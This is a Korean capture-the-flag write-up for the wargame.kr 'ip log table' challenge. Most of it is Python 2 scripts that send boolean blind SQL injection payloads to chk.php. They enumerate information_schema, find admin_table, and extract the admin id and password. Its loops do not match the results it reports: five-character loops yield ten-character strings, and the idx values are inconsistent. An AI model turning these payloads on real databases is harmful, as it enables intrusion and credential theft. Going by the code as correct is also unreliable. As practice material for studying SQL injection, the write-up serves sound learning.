
ip log table

 

Blind SQLi challenge.

You can use 'Ascii' to 'Date'

.
 
 

페이지 소스

 

<!-- Challenge page source as captured by the author; the table rows themselves are elided (the "." lines). -->
<style>
 #mv_admin {cursor:hand; font-family:verdana; padding:10px; font-weight:bold;}
 td{text-align:center; height:30px;}
 .menu {background-color:#163; color:#fab;}
 .menu td{font-weight:bold;}
 .list td{text-align:center; cursor:hand;}
</style>
<script src="./jquery.min.js"></script>
<script> var f; // the hidden form (#f); bound in init()
 // Hover highlight handlers; `this` is the element the handler was attached to.
 function ov(){ this.style.color="#11f"; this.style.background="#ff0"; this.style.fontWeight="bold";}
 function ou(){ this.style.color="#000"; this.style.background="#fff"; this.style.fontWeight="normal";}
 // Row click: copy the clicked element's DOM id into the hidden "idx" field and POST it to chk.php.
 // The value comes straight from the client, so chk.php must validate idx itself.
 function mv(){ f.idx.value=this.id; f.submit(); }
 function init(){
  // NOTE: a, iplist and i are assigned without var/let and become globals.
  a=document.getElementById("mv_admin");
  a.onmouseover=ov; a.onmouseout=ou; a.onclick=function(){window.location='admin.php';}
  f=document.getElementById("f"); iplist=$(".list");
  // Wire every .list row; the rows are not shown in this listing, so their id is
  // presumably the row's idx — confirm against the live page.
  for(i=0;i<iplist.length;i++){
   iplist[i].onmouseover=ov; iplist[i].onmouseout=ou; iplist[i].onclick=mv;
  }
 }
</script>
<body onload="init();">
<center>
<h1>ACCESS IP LOG TABLE</h1>
<hr /><div id="mv_admin">[+] admin login [+]</div><hr />
<table border=1 width=550 align=center>
<tr class='menu'><td>idx</td><td>IP address</td></tr>
.
.
.
.
</table>
</center>
<!-- Hidden form submitted by mv(); "idx" is the only field chk.php receives. -->
<form id="f" method="post" action="chk.php">
<input type="hidden" name="idx" value="blueh4g">
</form>
</body>

 

소스를 보면, 행을 클릭했을 때 chk.php에 해당 id값을 post로 보내서 값을 받는다.

 

 

 

 

 

 

스크립트를 짜서 확인해보자

 

import urllib
import urllib2
import re
 
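url = "http://wargame.kr:8080/ip_log_table/chk.php"

# Single probe request.  chk.php shows an "IP log time" for the row whose idx
# is posted; with a boolean condition appended to idx the displayed time
# differs between a true and a false condition (the author's two sample
# outputs follow this listing).  Note the probe uses idx 39749 while the
# sample outputs quote 39748.
opener = urllib2.build_opener(urllib2.HTTPHandler)
form = {"idx": "39749 and 1=0#"}
body = urllib.urlencode(form)
request = urllib2.Request(url, body)
# add_header(name, value) takes two arguments.  The original wrote
# 'User-Agent''Mozilla/...' with the comma missing, which concatenates the two
# literals into one argument and raises TypeError before any request is sent.
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
request.add_header('Cookie', 'PHPSESSID=cookie')  # placeholder session id as left by the author

response = opener.open(request)
try:
    data = response.read()
finally:
    response.close()  # release the connection even if read() fails

print data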
 

 

39748 and 1=1    => TRUE => IP log time : 2020-01-01 17:43:20

39748 and 1=0    => FALSE => IP log time : 1970-01-01 09:00:00

 

 

이것을 이용해서 blind sqli를 하면 된다.

 

 

 

 

 

 

 

 

import urllib
import urllib2
import sys
import time
 
key = ""  # characters recovered so far; the (disabled) loops below append to it
 
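def chk(payload):
    """POST *payload* as the "idx" field to chk.php and return the response body.

    Callers test the condition embedded in *payload* by checking whether the
    epoch string "1970-01-01 09:00:00" appears in the returned text (per the
    author's observation, a false condition makes the page show that date).
    The payload and the body are also printed for tracing.

    Args:
        payload: the full value sent as ``idx``.

    Returns:
        The raw response body as returned by ``read()``.
    """
    url = "http://wargame.kr:8080/ip_log_table/chk.php"

    opener = urllib2.build_opener(urllib2.HTTPHandler)
    body = urllib.urlencode({"idx": payload})
    request = urllib2.Request(url, body)
    # add_header(name, value) takes two arguments.  The original omitted the
    # comma between the two literals, which concatenated them into a single
    # argument and raised TypeError on every call.
    request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
    response = opener.open(request)
    try:
        data = response.read()
    finally:
        response.close()  # do not leak the connection on a failed read

    print payload
    print data
    return data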
 
 
# The loops below are disabled by wrapping them in string literals; the author
# ran them one at a time and recorded each result after it.  Every iteration is
# one boolean probe through chk(): a condition is appended to a valid idx and
# the absence of the epoch date marks it true.  Each character costs up to 94
# requests (ord 33..126) spaced 0.1 s apart, so on the server side a run shows
# up as a long burst of near-identical POSTs to chk.php differing only in idx.
# Stage 1: count of rows in information_schema.tables, scanned linearly 70..99.
'''
for i in range(70,100):
    payload = "39749 and (select count(*) from information_schema.tables)="+str(i)
    if not "1970-01-01 09:00:00" in chk(payload):
        key += str(i)
        print "[*] " +key
        break
    else:
        print "[-] Fail!"
    time.sleep(0.1)
'''
#result : 72
 
 
 
# Stage 2: table name at offset 71 (the last of the 72 rows), one character per outer iteration.
'''
for i in range(15):
    for j in range(33,127):
        payload = "39749 and ord(substring((select table_name from information_schema.tables limit 71,1),"+str(i+1)+",1))="+str(j)+"#"
        print chr(j)
        if not "1970-01-01 09:00:00" in chk(payload):
            key += chr(j)
            print "[*] " +key
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
'''
#result : ip_table
 
 
 
 
# Stage 3: same loop for the table name at offset 70.  `key` is not reset between
# stages, so the printed "[*]" prefix carries the previous stage's characters.
'''
for i in range(15):
    for j in range(33,127):
        payload = "39749 and ord(substring((select table_name from information_schema.tables limit 70,1),"+str(i+1)+",1))="+str(j)+"#"
        print chr(j)
        if not "1970-01-01 09:00:00" in chk(payload):
            key += chr(j)
            print "[*] " +key
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
'''
#result : admin_table
 
 
 
 
 
# Stage 4: the id column of admin_table; the column name was guessed from the
# login form (see the prose after this listing), not enumerated.
'''
for i in range(5):
    for j in range(33,127):
        payload = "39749 and ord(substring((select id from admin_table),"+str(i+1)+",1))="+str(j)+"#"
        print chr(j)
        if not "1970-01-01 09:00:00" in chk(payload):
            key += chr(j)
            print "[*] " +key
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
'''
#result : blue_admin
 
 
 
 
# Stage 5: the ps column of admin_table, same loop shape as stage 4.
'''
for i in range(5):
    for j in range(33,127):
        payload = "39749 and ord(substring((select ps from admin_table),"+str(i+1)+",1))="+str(j)+"#"
        print chr(j)
        if not "1970-01-01 09:00:00" in chk(payload):
            key += chr(j)
            print "[*] " +key
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
'''
#result : 0h~myp4ss!
 

 

칼럼개수가 너무 많아서 칼럼명을 찾기가 힘들다.

 

로그인 페이지에 있는 id와 ps를 그대로 칼럼명으로 썼더니 됐다.

 

 

 

 

얻은 id와 pw로 로그인을 하면 된다.

